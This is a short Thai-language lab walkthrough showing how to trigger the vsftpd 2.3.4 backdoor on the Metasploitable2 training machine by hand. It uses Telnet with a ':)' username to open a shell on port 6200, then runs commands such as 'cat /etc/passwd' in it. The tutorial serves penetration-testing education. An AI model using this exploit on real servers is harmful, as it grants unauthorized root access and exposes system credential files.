How to exploit vsftpd backdoor (manually) – Metasploitable2

บทนำ (Overview)

บทความที่แล้วได้นำเสนอวิธีการ “Exploit” ช่องโหว่ “vsftpd backdoor” โดยใช้ “Metasploit” (How to exploit vsftpd backdoor – Metasploitable2) มาในบทความนี้จะมาทดสอบกันว่าตัวช่องโหว่นั้นสามารถยึดได้โดยวิธีการอะไร โดยเราจะเครื่องมือคือ “Nmap” และ “Telnet”

ขั้นตอน (Steps)

  1. เริ่มแรกเราลองมาดูว่าช่องโหว่ดังกล่าวที่เรียกว่า “Backdoor” มันเป็นอย่างไร จากที่เคยเกริ่นนำเอาไว้คือมันมี “Backdoor” ของ “Port” หมายเลข “6200” ที่สามารถเรียกใช้งานคำสั่งของ “OS” ได้แต่ในยามปกติมันจะถูกปิดอยู่ลองทดสอบดังนี้
    nmap 192.168.1.55 -p 6200
    

    Metasploitable2-ftp-m01

  2. ที่นี้การจะเปิดมันได้ต้อง “Login”  โดยใช้ “Username” ที่ลงท้ายด้วย “:)” ส่วนรหัสผ่านเป็นอะไรก็ได้ ไปยัง “Port” หมายเลข “21” ดังนี้
    root@kali:~# telnet 192.168.1.55 21
    Trying 192.168.1.55...
    Connected to 192.168.1.55.
    Escape character is '^]'.
    220 (vsFTPd 2.3.4)
    user qwerty:)
    331 Please specify the password.
    pass qwertyuiop
    

    Metasploitable2-ftp-m02

  3. ทีนี้ลองตรวจสอบที่ “Port” หมายเลข “6200” อีกที พบว่าได้เปิดขึ้นมาแล้ว Metasploitable2-ftp-m03
  4. “Port” หมายเลข “6200” จะยังเปิดอยู่จนกระทั้งเราปิดการเชื่อมต่อที่ “Port” หมายเลข “21” ขั้นตอนต่อไปเราจะเชื่อมต่อกับ “Port” หมายเลข “6200” เพื่อให้สามารถ “Shell command” ได้ Metasploitable2-ftp-m04
  5. เราสามารถใช้งานคำสั่งรูปแบบดังนี้ “คำสั่ง อาร์กิวเมนต์;” เช่น
    id;
    ls -l;
    cat /etc/passwd;
    

    Metasploitable2-ftp-m05

ใส่ความเห็น